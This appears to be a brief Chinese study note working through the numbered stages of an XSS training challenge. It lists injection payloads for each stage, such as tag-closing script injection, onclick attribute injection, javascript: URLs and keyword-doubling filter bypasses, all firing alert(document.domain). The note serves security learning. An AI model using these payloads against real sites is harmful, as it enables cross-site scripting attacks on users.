Web安全测试学习笔记

 1. <script>alert(document.domain)</script>

 2. 先闭合input标签，再加入脚本："><script>alert(document.domain)</script>

4.

可以利用参数p3：p1=11&p2=Japan&p3="><script>alert(document.domain)</script>

6. " onclick='alert(document.domain)'

7. 123" onclick=alert(document.domain)

8. javascript:alert(document.domain);

9. utf7编码，没试成功

10. 过滤了关键字domain，双写绕过：" onclick='alert(document.dodomainmain)'

11. 页面打不开

12. 过滤了空格、引号、<>，IE下面：``onmouseover=alert(document.domain)

 

13、14. 网上找的：xss:expr/*XSS*/ession(alert(document.domain));ie试了下没成功

15.<>被转义了，用十六进制编码绕过

16. 页面打不开

17、18. 字符集相关的，只存在于IE，跳过